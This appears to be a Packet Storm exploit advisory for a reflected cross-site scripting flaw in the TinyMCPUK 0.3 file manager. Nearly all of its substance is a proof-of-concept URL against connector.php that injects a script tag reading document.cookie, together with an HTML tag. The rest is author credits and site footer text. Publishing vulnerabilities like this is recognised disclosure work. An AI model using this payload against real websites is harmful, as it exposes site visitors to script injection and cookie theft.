Tinymcpuk version 0.3 suffers from a cross site scripting vulnerability.
69e86c06c2d035cac55fe4ede3f462eab24d7a8b5af640371aeb3547909883d6=================================================================
tinymcpuk xss vulnerability
=================================================================
# Exploit Title: tinymcpuk xss vulnerability
# Google Dork: n/a
# Date: 1/12/2012 (GMT+7)
# Exploit Author: eidelweiss (@randyarios)
# Vendor Homepage: http://sourceforge.net/projects/p4a/files/tinymcpuk/
# Software Link: http://sourceforge.net/projects/p4a/files/tinymcpuk/0.3/
# Version: 0.3
# Tested on: windows & Ubuntu Linux
[!] about
TinyMCPUK - TinyMCE with file/image manager.
TinyMCPUK brings you the powerful TinyMCE plus
the MCPUK file manager and ImageManager
strictly integrated together.
[!] exploit & p0c
/tinymcpuk/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>
[!] sample poc
http://host/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>
==========================| -=[ E0F ]=- |==========================
Nb: Graatz to om wenk and all DC member.. sorry om Suntuk banget gue wkakwakwkawk.. bavod!!!
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed